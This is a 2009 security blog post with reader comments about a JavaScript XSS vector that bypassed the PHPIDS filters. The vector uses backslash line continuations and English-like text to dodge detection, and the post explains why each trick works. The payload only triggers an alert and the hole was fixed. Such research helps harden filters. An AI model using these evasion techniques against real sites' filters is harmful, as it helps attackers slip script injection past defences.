PHPIDS bypass

Sunday, 4 January 2009

I haven’t hacked the PHPIDS for a while but David Lindsay (AKA Thornmaker) inspired me. When I say hacked I mean in a good way because finding bypasses helps improve the filters πŸ™‚

Here is my vector:-

/Please submit the string\
to help us make the \
PHPIDS better./,y=('aler\
t'),x=this,x=x[y]
x('I cant let you have all the fun thornmaker'),/abc abc\
abc abc abc\
abc\
/,/abc abc\
abc abc abc\
abc\
/

Notice the English like text in order to bypass the centrifuge detection. I use backslashes to create strings in order to bypass the regular expressions. “this” refers to the current window and the string alert is passed to the window object which creates a reference to the alert function. It’s worth noting Mario fixed it very quickly so it no longer works. If you want a go and want to come up with your own vector then check out the phpids demo page.

The entry 'PHPIDS bypass' was posted on January 4th, 2009 at 9:28 pm and is filed under php, Security, xss. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

3 Responses to “PHPIDS bypass”

  1. thornmaker writes:
    No. 1 — January 5th, 2009 at 3:23 am

    backslashes with multilines… nice! I was actually just thinking about that the other night, but in a different context – never occured to me to try it in a bypass πŸ™‚

  2. Gareth Heyes writes:
    No. 2 — January 5th, 2009 at 9:43 am

    I was also thinking cdata could be another way of doing it πŸ™‚

  3. Gareth Heyes writes:
    No. 3 — January 5th, 2009 at 10:19 am

    CData doesn’t spilt strings nicely πŸ™ or reg exps. Just tested it now. There must be another way though

«
»